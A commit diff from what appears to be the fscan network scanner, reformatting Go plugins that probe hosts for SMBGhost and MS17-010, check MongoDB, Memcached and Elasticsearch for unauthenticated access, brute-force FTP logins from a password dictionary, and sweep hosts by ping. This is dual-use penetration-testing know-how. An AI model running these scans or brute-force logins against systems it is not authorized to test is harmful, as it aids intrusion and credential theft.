已加入yaml解析引擎,支持xray的Poc,默认使用所有Poc(已对xray的poc进行了筛选),可以使用-pocname weblogic,只使用某种或某个poc。需要go版本1.16以上,只能自行编译最新版go来进行测试

# Conflicts:
#	README.md

Plugins/CVE-2020-0796.go

@@ -1,113 +1,110 @@
 package Plugins
-//Ladon Scanner for golang 
-//Author: k8gege
-//K8Blog: http://k8gege.org
-//Github: https://github.com/k8gege
+
 import (
-	"../common"
 	"bytes"
 	"fmt"
 	"net"
 	"sync"
 	"time"
+
+	"github.com/shadow1ng/fscan/common"
 )
 
 const (
-	pkt =
-	"\x00" + // session
-	"\x00\x00\xc0"+ // legth
+	pkt = "\x00" + // session
+		"\x00\x00\xc0" + // legth
 
-	"\xfeSMB@\x00"+ // protocol
+		"\xfeSMB@\x00" + // protocol
 
-	//[MS-SMB2]: SMB2 NEGOTIATE Request 
-	//https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-smb2/e14db7ff-763a-4263-8b10-0c3944f52fc5
+		//[MS-SMB2]: SMB2 NEGOTIATE Request
+		//https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-smb2/e14db7ff-763a-4263-8b10-0c3944f52fc5
 
-	"\x00\x00" +
-	"\x00\x00" +
-	"\x00\x00" +
-	"\x00\x00" +
-	"\x1f\x00" +
-	"\x00\x00\x00\x00" +
-	"\x00\x00\x00\x00" +
-	"\x00\x00\x00\x00" +
-	"\x00\x00\x00\x00" +
-	"\x00\x00\x00\x00" +
-	"\x00\x00\x00\x00" +
-	"\x00\x00\x00\x00" +
-	"\x00\x00\x00\x00" +
-	"\x00\x00\x00\x00" +
-	"\x00\x00\x00\x00" +
-	"\x00\x00\x00\x00" +
-	"\x00\x00\x00\x00" + 
+		"\x00\x00" +
+		"\x00\x00" +
+		"\x00\x00" +
+		"\x00\x00" +
+		"\x1f\x00" +
+		"\x00\x00\x00\x00" +
+		"\x00\x00\x00\x00" +
+		"\x00\x00\x00\x00" +
+		"\x00\x00\x00\x00" +
+		"\x00\x00\x00\x00" +
+		"\x00\x00\x00\x00" +
+		"\x00\x00\x00\x00" +
+		"\x00\x00\x00\x00" +
+		"\x00\x00\x00\x00" +
+		"\x00\x00\x00\x00" +
+		"\x00\x00\x00\x00" +
+		"\x00\x00\x00\x00" +
 
-	// [MS-SMB2]: SMB2 NEGOTIATE_CONTEXT
-	// https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-smb2/15332256-522e-4a53-8cd7-0bd17678a2f7
+		// [MS-SMB2]: SMB2 NEGOTIATE_CONTEXT
+		// https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-smb2/15332256-522e-4a53-8cd7-0bd17678a2f7
 
-	"$\x00" +
-	"\x08\x00" +
-	"\x01\x00" +
-	"\x00\x00" +
-	"\x7f\x00\x00\x00" +
-	"\x00\x00\x00\x00" +
-	"\x00\x00\x00\x00" +
-	"\x00\x00\x00\x00" +
-	"\x00\x00\x00\x00" +
-	"x\x00" +
-	"\x00\x00" +
-	"\x02\x00" +
-	"\x00\x00" +
-	"\x02\x02" +
-	"\x10\x02" +
-	"\x22\x02" +
-	"$\x02" +
-	"\x00\x03" +
-	"\x02\x03" +
-	"\x10\x03" +
-	"\x11\x03" +
-	"\x00\x00\x00\x00" +
+		"$\x00" +
+		"\x08\x00" +
+		"\x01\x00" +
+		"\x00\x00" +
+		"\x7f\x00\x00\x00" +
+		"\x00\x00\x00\x00" +
+		"\x00\x00\x00\x00" +
+		"\x00\x00\x00\x00" +
+		"\x00\x00\x00\x00" +
+		"x\x00" +
+		"\x00\x00" +
+		"\x02\x00" +
+		"\x00\x00" +
+		"\x02\x02" +
+		"\x10\x02" +
+		"\x22\x02" +
+		"$\x02" +
+		"\x00\x03" +
+		"\x02\x03" +
+		"\x10\x03" +
+		"\x11\x03" +
+		"\x00\x00\x00\x00" +
 
+		// [MS-SMB2]: SMB2_PREAUTH_INTEGRITY_CAPABILITIES
+		// https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-smb2/5a07bd66-4734-4af8-abcf-5a44ff7ee0e5
 
-	// [MS-SMB2]: SMB2_PREAUTH_INTEGRITY_CAPABILITIES
-	// https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-smb2/5a07bd66-4734-4af8-abcf-5a44ff7ee0e5
+		"\x01\x00" +
+		"&\x00" +
+		"\x00\x00\x00\x00" +
+		"\x01\x00" +
+		"\x20\x00" +
+		"\x01\x00" +
+		"\x00\x00\x00\x00" +
+		"\x00\x00\x00\x00" +
+		"\x00\x00\x00\x00" +
+		"\x00\x00\x00\x00" +
+		"\x00\x00\x00\x00" +
+		"\x00\x00\x00\x00" +
+		"\x00\x00\x00\x00" +
+		"\x00\x00\x00\x00" +
+		"\x00\x00" +
 
-	"\x01\x00" +
-	"&\x00" +
-	"\x00\x00\x00\x00" +
-	"\x01\x00" +
-	"\x20\x00" +
-	"\x01\x00" +
-	"\x00\x00\x00\x00" +
-	"\x00\x00\x00\x00" +
-	"\x00\x00\x00\x00" +
-	"\x00\x00\x00\x00" +
-	"\x00\x00\x00\x00" +
-	"\x00\x00\x00\x00" +
-	"\x00\x00\x00\x00" +
-	"\x00\x00\x00\x00" +
-	"\x00\x00" +
+		// [MS-SMB2]: SMB2_COMPRESSION_CAPABILITIES
+		// https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-smb2/78e0c942-ab41-472b-b117-4a95ebe88271
 
-	// [MS-SMB2]: SMB2_COMPRESSION_CAPABILITIES
-	// https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-smb2/78e0c942-ab41-472b-b117-4a95ebe88271
-
-	"\x03\x00" +
-	"\x0e\x00" +
-	"\x00\x00\x00\x00" +
-	"\x01\x00" + //CompressionAlgorithmCount
-	"\x00\x00" +
-	"\x01\x00\x00\x00" +
-	"\x01\x00" + //LZNT1
-	"\x00\x00" +
-	"\x00\x00\x00\x00"
+		"\x03\x00" +
+		"\x0e\x00" +
+		"\x00\x00\x00\x00" +
+		"\x01\x00" + //CompressionAlgorithmCount
+		"\x00\x00" +
+		"\x01\x00\x00\x00" +
+		"\x01\x00" + //LZNT1
+		"\x00\x00" +
+		"\x00\x00\x00\x00"
 )
-func SmbGhost(info *common.HostInfo,ch chan int,wg *sync.WaitGroup) {
+
+func SmbGhost(info *common.HostInfo, ch chan int, wg *sync.WaitGroup) {
 	SmbGhostScan(info)
 	wg.Done()
-	<- ch
+	<-ch
 }
 
 func SmbGhostScan(info *common.HostInfo) {
-	ip,port,timeout := info.Host,445,time.Duration(info.Timeout)*time.Second
-	addr:=fmt.Sprintf("%s:%d",info.Host,port)
+	ip, port, timeout := info.Host, 445, time.Duration(info.Timeout)*time.Second
+	addr := fmt.Sprintf("%s:%d", info.Host, port)
 	conn, err := net.DialTimeout("tcp", addr, timeout)
 	if err != nil {
 		return
@@ -118,10 +115,10 @@ func SmbGhostScan(info *common.HostInfo) {
 		n, err := conn.Read(buff)
 		if err != nil {
 			return
-		}else {
+		} else {
 			defer conn.Close()
 			if bytes.Contains([]byte(buff[:n]), []byte("Public")) == true {
-				result := fmt.Sprintf("%v CVE-2020-0796 SmbGhost Vulnerable",ip)
+				result := fmt.Sprintf("%v CVE-2020-0796 SmbGhost Vulnerable", ip)
 				common.LogSuccess(result)
 			}
 		}

Plugins/base.go

@@ -14,39 +14,5 @@ var PluginList = map[string]interface{}{
 	"27017":MongodbScan,
 	"1000001": MS17010,
 	"1000002": SmbGhost,
-	//"WebTitle":WebTitle,
+	"1000003":WebTitle,
 }
-
-//var Passwords = []string{"admin123A","123456","admin","root","password","123123","123","1","{user}","{user}{user}","{user}1","{user}123","{user}2016","{user}2015","{user}!","","P@ssw0rd!!","qwa123","12345678","test","123qwe!@#","123456789","123321","1314520","666666","woaini","fuckyou","000000","1234567890","8888888","qwerty","1qaz2wsx","abc123","abc123456","1q2w3e4r","123qwe","p@ssw0rd","p@55w0rd","password!","p@ssw0rd!","password1","r00t","tomcat","apache","system","huawei","admin123","zte"}
-//const Username = "admin"
-//const Password = "123456"
-//const Timeout = 3 * time.Second
-//const FTPPORT = 21
-//const SSHPORT = 22
-//const MEMCACHEDPORT = 11211
-//const MONGODBPORT  = 27017
-//const MSSQLPORT = 1433
-//const OraclePORT = 1433
-//const PSQLPORT = 5432
-//const REDISPORT = 6379
-//const MYSQLPORT  = 3306
-//const SMBPORT = 445
-//const POSTGRESPORT = 5432
-
-
-//var PluginList = map[string]interface{}{
-//	"ftp": FtpScan,
-//	"mysql": MysqlScan,
-//	//"mongodb":MgoConn,
-//	"mssql":MssqlScan,
-//	"redis": RedisScan,
-//	//"smb": SmbScan,
-//	"ssh": SshScan,
-//	//"portscan": PortConn,
-//	//"icmp": IcmpConn,
-//	"postgresql": PostgresScan,
-//	//"urlscan":UrlConn,
-//	//"auth":ApacheConn,
-//	//"subdomain":SDConn,
-//	//"memcached":MemConn,
-//}

Plugins/elasticsearch.go

@@ -1,7 +1,6 @@
 package Plugins
 
 import (
-	"../common"
 	"fmt"
 	"io/ioutil"
 	"net"
@@ -9,63 +8,47 @@ import (
 	"strings"
 	"sync"
 	"time"
+
+	"github.com/shadow1ng/fscan/common"
 )
 
-func elasticsearchScan(info *common.HostInfo,ch chan int,wg *sync.WaitGroup)  {
+func elasticsearchScan(info *common.HostInfo, ch chan int, wg *sync.WaitGroup) {
 	geturl2(info)
-    wg.Done()
+	wg.Done()
 	<-ch
 }
 
-
-func geturl2(info *common.HostInfo) (flag bool,err error) {
+func geturl2(info *common.HostInfo) (flag bool, err error) {
 	flag = false
-	url := fmt.Sprintf("%s:%d/_cat",info.Url,common.PORTList["elastic"])
+	url := fmt.Sprintf("%s:%d/_cat", info.Url, common.PORTList["elastic"])
 	var client = &http.Client{
-		Transport:&http.Transport{
-			DialContext:(&net.Dialer{
-				Timeout:time.Duration(info.Timeout)*time.Second,
+		Transport: &http.Transport{
+			DialContext: (&net.Dialer{
+				Timeout: time.Duration(info.Timeout) * time.Second,
 			}).DialContext,
 		},
-		CheckRedirect:func(req *http.Request, via []*http.Request) error{
+		CheckRedirect: func(req *http.Request, via []*http.Request) error {
 			return http.ErrUseLastResponse
 		},
 	}
-	res,err:=http.NewRequest("GET",url,nil)
-	if err==nil{
-		res.Header.Add("User-agent","Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1468.0 Safari/537.36")
-		res.Header.Add("Accept","*/*")
-		res.Header.Add("Accept-Language","zh-CN,zh;q=0.9")
-		res.Header.Add("Accept-Encoding","gzip, deflate")
-		res.Header.Add("Connection","close")
-		resp,err:=client.Do(res)
+	res, err := http.NewRequest("GET", url, nil)
+	if err == nil {
+		res.Header.Add("User-agent", "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1468.0 Safari/537.36")
+		res.Header.Add("Accept", "*/*")
+		res.Header.Add("Accept-Language", "zh-CN,zh;q=0.9")
+		res.Header.Add("Accept-Encoding", "gzip, deflate")
+		res.Header.Add("Connection", "close")
+		resp, err := client.Do(res)
 
-		if err==nil{
+		if err == nil {
 			defer resp.Body.Close()
 			body, _ := ioutil.ReadAll(resp.Body)
-			if strings.Contains(string(body),"/_cat/master"){
-				result := fmt.Sprintf("Elastic:%s unauthorized",url)
+			if strings.Contains(string(body), "/_cat/master") {
+				result := fmt.Sprintf("Elastic:%s unauthorized", url)
 				common.LogSuccess(result)
 				flag = true
 			}
 		}
 	}
-	return flag,err
-
-	//fmt.Print("\n")
+	return flag, err
 }
-
-
-//if info.Cookie!=""{
-//	res.Header.Add("Cookie",info.Cookie)
-//}
-//if info.Header!=""{
-//	var header = make(map[string]string)
-//	err:=json.Unmarshal([]byte(info.Header),&header)
-//	if err!=nil{
-//		Misc.CheckErr(err)
-//	}
-//	for k,v:=range header{
-//		res.Header.Add(k,v)
-//	}
-//}

Plugins/findnet.go

@@ -11,33 +11,33 @@ import (
 	"fmt"
 	"sync"
 
-	"../common"
+	"github.com/shadow1ng/fscan/common"
 )
 
 var (
-	buffer_v1, _  = hex.DecodeString("05000b03100000004800000001000000b810b810000000000100000000000100c4fefc9960521b10bbcb00aa0021347a00000000045d888aeb1cc9119fe808002b10486002000000")
-	buffer_v2, _  = hex.DecodeString("050000031000000018000000010000000000000000000500")
-	buffer_v3, _  = hex.DecodeString("0900ffff0000")
-
+	buffer_v1, _ = hex.DecodeString("05000b03100000004800000001000000b810b810000000000100000000000100c4fefc9960521b10bbcb00aa0021347a00000000045d888aeb1cc9119fe808002b10486002000000")
+	buffer_v2, _ = hex.DecodeString("050000031000000018000000010000000000000000000500")
+	buffer_v3, _ = hex.DecodeString("0900ffff0000")
 )
-func Findnet(info *common.HostInfo,ch chan int,wg *sync.WaitGroup) {
+
+func Findnet(info *common.HostInfo, ch chan int, wg *sync.WaitGroup) {
 	FindnetScan(info)
 	wg.Done()
-	<- ch
+	<-ch
 }
 
 func FindnetScan(info *common.HostInfo) {
-	realhost:=fmt.Sprintf("%s:%d",info.Host,135)
-	conn,err := net.DialTimeout("tcp",realhost,time.Duration(info.Timeout)*time.Second)
-	if err != nil{
+	realhost := fmt.Sprintf("%s:%d", info.Host, 135)
+	conn, err := net.DialTimeout("tcp", realhost, time.Duration(info.Timeout)*time.Second)
+	if err != nil {
 		return
 	}
-	conn.SetDeadline(time.Now().Add(time.Duration(info.Timeout)*time.Second))
+	conn.SetDeadline(time.Now().Add(time.Duration(info.Timeout) * time.Second))
 	defer conn.Close()
 	conn.Write(buffer_v1)
 	reply := make([]byte, 4096)
 	_, err = conn.Read(reply)
-	if err != nil{
+	if err != nil {
 		return
 	}
 	conn.Write(buffer_v2)
@@ -47,32 +47,29 @@ func FindnetScan(info *common.HostInfo) {
 	text := reply[42:]
 	flag := true
 	for i := 0; i < len(text)-5; i++ {
-		if bytes.Equal(text[i:i+6], buffer_v3){
+		if bytes.Equal(text[i:i+6], buffer_v3) {
 			text = text[:i-4]
 			flag = false
 			break
 		}
 	}
-	if flag{
+	if flag {
 		return
 	}
-	read(text,info.Host)
+	read(text, info.Host)
 }
-func read(text []byte,host string)  {
+func read(text []byte, host string) {
 	encodedStr := hex.EncodeToString(text)
 	hostnames := strings.Replace(encodedStr, "0700", "", -1)
 	hostname := strings.Split(hostnames, "000000")
-	result := "NetInfo:\n[*]"+host
+	result := "NetInfo:\n[*]" + host
 	for i := 0; i < len(hostname); i++ {
 		hostname[i] = strings.Replace(hostname[i], "00", "", -1)
-		host,err := hex.DecodeString(hostname[i])
-		if err != nil{
+		host, err := hex.DecodeString(hostname[i])
+		if err != nil {
 			return
 		}
-		result += "\n   [->]"+string(host)
-		//result += "\n   ["+string(host)+"]"
+		result += "\n   [->]" + string(host)
 	}
 	common.LogSuccess(result)
 }
-
-

Plugins/ftp.go

@@ -1,41 +1,42 @@
 package Plugins
 
 import (
-	"../common"
-	"github.com/jlaffaye/ftp"
 	"fmt"
 	"strings"
 	"sync"
 	"time"
+
+	"github.com/jlaffaye/ftp"
+	"github.com/shadow1ng/fscan/common"
 )
 
-func FtpScan(info *common.HostInfo,ch chan int,wg *sync.WaitGroup) {
-	Loop:
-	for _,user:=range common.Userdict["ftp"]{
-		for _,pass:=range common.Passwords{
+func FtpScan(info *common.HostInfo, ch chan int, wg *sync.WaitGroup) {
+Loop:
+	for _, user := range common.Userdict["ftp"] {
+		for _, pass := range common.Passwords {
 			pass = strings.Replace(pass, "{user}", string(user), -1)
-			flag,err := FtpConn(info,user,pass,ch,wg)
-			if flag==true && err==nil {
+			flag, err := FtpConn(info, user, pass)
+			if flag == true && err == nil {
 				break Loop
 			}
 		}
 	}
 	wg.Done()
-	<- ch
+	<-ch
 }
 
-func FtpConn(info *common.HostInfo,user string,pass string,ch chan int,wg *sync.WaitGroup)(flag bool,err error){
+func FtpConn(info *common.HostInfo, user string, pass string) (flag bool, err error) {
 	flag = false
-	Host,Port,Username,Password := info.Host, common.PORTList["ftp"],user, pass
-	conn, err := ftp.DialTimeout(fmt.Sprintf("%v:%v",Host,Port), time.Duration(info.Timeout)*time.Second)
+	Host, Port, Username, Password := info.Host, common.PORTList["ftp"], user, pass
+	conn, err := ftp.DialTimeout(fmt.Sprintf("%v:%v", Host, Port), time.Duration(info.Timeout)*time.Second)
 	if err == nil {
-		err = conn.Login(Username,Password)
+		err = conn.Login(Username, Password)
 		if err == nil {
 			defer conn.Logout()
-			result := fmt.Sprintf("FTP:%v:%v:%v %v",Host,Port,Username,Password)
+			result := fmt.Sprintf("FTP:%v:%v:%v %v", Host, Port, Username, Password)
 			common.LogSuccess(result)
 			flag = true
 		}
 	}
-	return flag,err
-}
+	return flag, err
+}

Plugins/icmp.go

@@ -2,7 +2,6 @@ package Plugins
 
 import (
 	"bytes"
-	"encoding/binary"
 	"fmt"
 	"net"
 	"os"
@@ -14,26 +13,18 @@ import (
 	"time"
 )
 
-var icmp ICMP
-
 var AliveHosts []string
 
-type ICMP struct {
-	Type        uint8
-	Code        uint8
-	Checksum    uint16
-	Identifier  uint16
-	SequenceNum uint16
-}
+var SysInfo = GetSys()
 
 type SystemInfo struct {
-	OS 			  string
-	ARCH          string
-	HostName      string
-	Groupid  	  string
-	Userid		  string
-	Username	  string
-	UserHomeDir	  string
+	OS          string
+	ARCH        string
+	HostName    string
+	Groupid     string
+	Userid      string
+	Username    string
+	UserHomeDir string
 }
 
 func GetSys() SystemInfo {
@@ -56,120 +47,97 @@ func GetSys() SystemInfo {
 }
 
 func isping(ip string) bool {
-	icmp.Type = 8
-	icmp.Code = 0
-	icmp.Checksum = 0
-	icmp.Identifier = 0
-	icmp.SequenceNum = 0
-
-	recvBuf := make([]byte, 32)
-	var buffer bytes.Buffer
-
-	binary.Write(&buffer, binary.BigEndian, icmp)
-	icmp.Checksum = CheckSum(buffer.Bytes())
-
-	buffer.Reset()
-	binary.Write(&buffer, binary.BigEndian, icmp)
-
-	Time, _ := time.ParseDuration("2s")
+	IcmpByte := []byte{8, 0, 247, 255, 0, 0, 0, 0}
+	Time, _ := time.ParseDuration("3s")
 	conn, err := net.DialTimeout("ip4:icmp", ip, Time)
 	if err != nil {
 		return false
 	}
-	_, err = conn.Write(buffer.Bytes())
-	if err != nil {
-		return false
-	}
-	conn.SetReadDeadline(time.Now().Add(time.Second * 2))
-	num, err := conn.Read(recvBuf)
+	defer conn.Close()
+	_, err = conn.Write(IcmpByte)
 	if err != nil {
 		return false
 	}
 
-	conn.SetReadDeadline(time.Time{})
+	if err := conn.SetReadDeadline(time.Now().Add(time.Second * 3)); err != nil {
+		return false
+	}
 
+	recvBuf := make([]byte, 40)
+	num, err := conn.Read(recvBuf[0:40])
+	if err != nil {
+		return false
+	}
+	if err := conn.SetReadDeadline(time.Time{}); err != nil {
+		return false
+	}
 	if string(recvBuf[0:num]) != "" {
-		fmt.Printf("(ICMP) Target '%s' is alive\n",ip)
+		fmt.Printf("(ICMP) Target '%s' is alive\n", ip)
 		return true
 	}
 	return false
 
 }
 
-func CheckSum(data []byte) uint16 {
-	var (
-		sum    uint32
-		length int = len(data)
-		index  int
-	)
-	for length > 1 {
-		sum += uint32(data[index])<<8 + uint32(data[index+1])
-		index += 2
-		length -= 2
-	}
-	if length > 0 {
-		sum += uint32(data[index])
-	}
-	sum += (sum >> 16)
-
-	return uint16(^sum)
-}
-
-func IcmpCheck(hostslist []string) {
+func IcmpCheck(hostslist []string, IcmpThreads int) {
 	var wg sync.WaitGroup
 	mutex := &sync.Mutex{}
-	for _,host :=range hostslist{
+	limiter := make(chan struct{}, IcmpThreads)
+	for _, host := range hostslist {
 		wg.Add(1)
+		limiter <- struct{}{}
 		go func(host string) {
 			defer wg.Done()
-			if isping(host){
+			if isping(host) {
 				mutex.Lock()
 				AliveHosts = append(AliveHosts, host)
 				mutex.Unlock()
 			}
+			<-limiter
 		}(host)
+
 	}
 	wg.Wait()
 }
 
-func ExecCommandPing(ip string,bsenv string) bool {
-	command := exec.Command(bsenv, "-c", "ping -c 1 -w 1 "+ip+" >/dev/null && echo true || echo false")  //ping -c 1 -i 0.5 -t 4 -W 2 -w 5 "+ip+" >/dev/null && echo true || echo false"
+func ExecCommandPing(ip string, bsenv string) bool {
+	var command *exec.Cmd
+	if SysInfo.OS == "windows" {
+		command = exec.Command("cmd", "/c", "ping -n 1 -w 1 "+ip+" && echo true || echo false") //ping -c 1 -i 0.5 -t 4 -W 2 -w 5 "+ip+" >/dev/null && echo true || echo false"
+	} else if SysInfo.OS == "linux" {
+		command = exec.Command(bsenv, "-c", "ping -c 1 -w 1 "+ip+" >/dev/null && echo true || echo false") //ping -c 1 -i 0.5 -t 4 -W 2 -w 5 "+ip+" >/dev/null && echo true || echo false"
+	} else if SysInfo.OS == "darwin" {
+		command = exec.Command(bsenv, "-c", "ping -c 1 -W 1 "+ip+" >/dev/null && echo true || echo false") //ping -c 1 -i 0.5 -t 4 -W 2 -w 5 "+ip+" >/dev/null && echo true || echo false"
+	}
 	outinfo := bytes.Buffer{}
 	command.Stdout = &outinfo
 	err := command.Start()
-	if err != nil{
+	if err != nil {
 		return false
 	}
-
-	if err = command.Wait();err!=nil{
+	if err = command.Wait(); err != nil {
 		return false
-	}else{
-		if(strings.Contains(outinfo.String(), "true")) {
+	} else {
+		if strings.Contains(outinfo.String(), "true") {
 			return true
-		}else {
+		} else {
 			return false
 		}
 	}
 }
 
-func PingCMDcheck(hostslist []string,bsenv string) {
+func PingCMDcheck(hostslist []string, bsenv string) {
 	var wg sync.WaitGroup
 	mutex := &sync.Mutex{}
 	limiter := make(chan struct{}, 40)
-	//aliveHost := make(chan string, 20)
-	//go func() {
-	//	for s := range aliveHost {
-	//		fmt.Println(s)
-	//	}
-	//}()
-	for _,host :=range hostslist{
+	for _, host := range hostslist {
 		wg.Add(1)
 		limiter <- struct{}{}
 		go func(host string) {
 			defer wg.Done()
-			if ExecCommandPing(host,bsenv){
+			if ExecCommandPing(host, bsenv) {
 				mutex.Lock()
-				fmt.Printf("(Ping) Target '%s' is alive\n",host)
+				fmt.Printf("(Ping) Target '%s' is alive\n", host)
 				AliveHosts = append(AliveHosts, host)
 				mutex.Unlock()
 			}
@@ -177,26 +145,38 @@ func PingCMDcheck(hostslist []string,bsenv string) {
 		}(host)
 	}
 	wg.Wait()
-	//close(aliveHost)
 }
+func ICMPRun(hostslist []string, IcmpThreads int, Ping bool) []string {
 
-func ICMPRun(hostslist []string)  []string{
-	var sysinfo SystemInfo
-	sysinfo = GetSys()
-
-	if sysinfo.OS == "windows" {
-		IcmpCheck(hostslist)
-	}else if sysinfo.OS == "linux" {
-		if (sysinfo.Groupid == "0" || sysinfo.Userid == "0" || sysinfo.Username == "root") {
-			IcmpCheck(hostslist)
-		}else {
-			PingCMDcheck(hostslist,"/bin/bash")
+	if SysInfo.OS == "windows" {
+		if Ping == false {
+			IcmpCheck(hostslist, IcmpThreads)
+		} else {
+			PingCMDcheck(hostslist, "")
 		}
-	}else if sysinfo.OS == "darwin" {
-		if (sysinfo.Groupid == "0" || sysinfo.Userid == "0" || sysinfo.Username == "root") {
-			IcmpCheck(hostslist)
-		}else {
-			PingCMDcheck(hostslist,"/usr/local/bin/bash")
+	} else if SysInfo.OS == "linux" {
+		if SysInfo.Groupid == "0" || SysInfo.Userid == "0" || SysInfo.Username == "root" {
+			if Ping == false {
+				IcmpCheck(hostslist, IcmpThreads)
+			} else {
+				PingCMDcheck(hostslist, "/bin/bash")
+			}
+		} else {
+			fmt.Println("The current user permissions unable to send icmp packets")
+			fmt.Println("start ping")
+			PingCMDcheck(hostslist, "/bin/bash")
+		}
+	} else if SysInfo.OS == "darwin" {
+		if SysInfo.Groupid == "0" || SysInfo.Userid == "0" || SysInfo.Username == "root" {
+			if Ping == false {
+				IcmpCheck(hostslist, IcmpThreads)
+			} else {
+				PingCMDcheck(hostslist, "/bin/bash")
+			}
+		} else {
+			fmt.Println("The current user permissions unable to send icmp packets")
+			fmt.Println("start ping")
+			PingCMDcheck(hostslist, "/bin/bash")
 		}
 	}
 	return AliveHosts

Plugins/memcached.go

@@ -1,31 +1,32 @@
 package Plugins
 
 import (
-	"../common"
 	"fmt"
 	"net"
 	"strings"
 	"sync"
 	"time"
+
+	"github.com/shadow1ng/fscan/common"
 )
 
-func MemcachedScan(info *common.HostInfo,ch chan int,wg *sync.WaitGroup) (err error, result string) {
-	realhost:=fmt.Sprintf("%s:%d",info.Host,common.PORTList["mem"])
-	client,err:=net.DialTimeout("tcp",realhost,time.Duration(info.Timeout)*time.Second)
-	if err==nil {
-		client.SetDeadline(time.Now().Add(time.Duration(info.Timeout)*time.Second))
+func MemcachedScan(info *common.HostInfo, ch chan int, wg *sync.WaitGroup) (err error, result string) {
+	realhost := fmt.Sprintf("%s:%d", info.Host, common.PORTList["mem"])
+	client, err := net.DialTimeout("tcp", realhost, time.Duration(info.Timeout)*time.Second)
+	if err == nil {
+		client.SetDeadline(time.Now().Add(time.Duration(info.Timeout) * time.Second))
 		client.Write([]byte("stats\n")) //Set the key randomly to prevent the key on the server from being overwritten
 		rev := make([]byte, 1024)
 		n, err := client.Read(rev)
 		if err == nil {
 			if strings.Contains(string(rev[:n]), "STAT") {
 				defer client.Close()
-				result = fmt.Sprintf("Memcached:%s unauthorized",realhost)
+				result = fmt.Sprintf("Memcached:%s unauthorized", realhost)
 				common.LogSuccess(result)
 			}
 		}
 	}
 	wg.Done()
-	<- ch
+	<-ch
 	return err, result
 }

Plugins/mongodb.go

@@ -1,49 +1,51 @@
 package Plugins
 
 import (
-	"../common"
 	"fmt"
-	_ "github.com/denisenkom/go-mssqldb"
 	"net"
 	"strings"
 	"sync"
 	"time"
+
+	_ "github.com/denisenkom/go-mssqldb"
+	"github.com/shadow1ng/fscan/common"
 )
 
-
-func MongodbScan(info *common.HostInfo,ch chan int,wg *sync.WaitGroup) {
+func MongodbScan(info *common.HostInfo, ch chan int, wg *sync.WaitGroup) {
 	MongodbUnauth(info)
 	wg.Done()
-	<- ch
+	<-ch
 }
 
-func MongodbUnauth(info *common.HostInfo) (flag bool,err error) {
+func MongodbUnauth(info *common.HostInfo) (flag bool, err error) {
 	flag = false
-	send_data := []byte{58,0,0,0,167,65,0,0,0,0,0,0,212,7,0,0,0,0,0,0,97,100,109,105,110,46,36,99,109,100,0,0,0,0,0,255,255,255,255,19,0,0,0,16,105,115,109,97,115,116,101,114,0,1,0,0,0,0}
-	getlog_data := []byte{72,0,0,0,2,0,0,0,0,0,0,0,212,7,0,0,0,0,0,0,97,100,109,105,110,46,36,99,109,100,0,0,0,0,0,1,0,0,0,33,0,0,0,2,103,101,116,76,111,103,0,16,0,0,0,115,116,97,114,116,117,112,87,97,114,110,105,110,103,115,0,0}
-	realhost:=fmt.Sprintf("%s:%d",info.Host,common.PORTList["mgo"])
-	conn,err := net.DialTimeout("tcp",realhost,time.Duration(info.Timeout)*time.Second)
-	if err != nil{return}
+	send_data := []byte{58, 0, 0, 0, 167, 65, 0, 0, 0, 0, 0, 0, 212, 7, 0, 0, 0, 0, 0, 0, 97, 100, 109, 105, 110, 46, 36, 99, 109, 100, 0, 0, 0, 0, 0, 255, 255, 255, 255, 19, 0, 0, 0, 16, 105, 115, 109, 97, 115, 116, 101, 114, 0, 1, 0, 0, 0, 0}
+	getlog_data := []byte{72, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 212, 7, 0, 0, 0, 0, 0, 0, 97, 100, 109, 105, 110, 46, 36, 99, 109, 100, 0, 0, 0, 0, 0, 1, 0, 0, 0, 33, 0, 0, 0, 2, 103, 101, 116, 76, 111, 103, 0, 16, 0, 0, 0, 115, 116, 97, 114, 116, 117, 112, 87, 97, 114, 110, 105, 110, 103, 115, 0, 0}
+	realhost := fmt.Sprintf("%s:%d", info.Host, common.PORTList["mgo"])
+	conn, err := net.DialTimeout("tcp", realhost, time.Duration(info.Timeout)*time.Second)
+	if err != nil {
+		return
+	}
 	defer conn.Close()
 	conn.Write(send_data)
 	buf := make([]byte, 1024)
 	count, err := conn.Read(buf)
 	if err != nil {
-		return flag,err
+		return flag, err
 	}
 	text := string(buf[0:count])
-	if strings.Contains(text,"ismaster"){
+	if strings.Contains(text, "ismaster") {
 		conn.Write(getlog_data)
 		count, err := conn.Read(buf)
 		if err != nil {
-			return flag,err
+			return flag, err
 		}
 		text := string(buf[0:count])
-		if strings.Contains(text,"totalLinesWritten"){
+		if strings.Contains(text, "totalLinesWritten") {
 			flag = true
-			result := fmt.Sprintf("Mongodb:%v unauthorized",realhost)
+			result := fmt.Sprintf("Mongodb:%v unauthorized", realhost)
 			common.LogSuccess(result)
 		}
 	}
-	return flag,err
-}
+	return flag, err
+}

Plugins/ms17017.go

@@ -3,14 +3,11 @@ package Plugins
 import (
 	"encoding/binary"
 	"encoding/hex"
-	"sync"
-
-	//"flag"
 	"fmt"
+	"github.com/shadow1ng/fscan/common"
 	"net"
-	"../common"
 	"strings"
-	//"sync"
+	"sync"
 	"time"
 )
 
@@ -22,10 +19,10 @@ var (
 	trans2SessionSetupRequest, _ = hex.DecodeString("0000004eff534d4232000000001807c00000000000000000000000000008fffe000841000f0c0000000100000000000000a6d9a40000000c00420000004e0001000e000d0000000000000000000000000000")
 )
 
-func MS17010(info *common.HostInfo,ch chan int,wg *sync.WaitGroup) {
+func MS17010(info *common.HostInfo, ch chan int, wg *sync.WaitGroup) {
 	MS17010Scan(info)
 	wg.Done()
-	<- ch
+	<-ch
 }
 
 func MS17010Scan(info *common.HostInfo) {
@@ -39,7 +36,7 @@ func MS17010Scan(info *common.HostInfo) {
 	}
 	defer conn.Close()
 
-	conn.SetDeadline(time.Now().Add(time.Duration(info.Timeout)*time.Second))
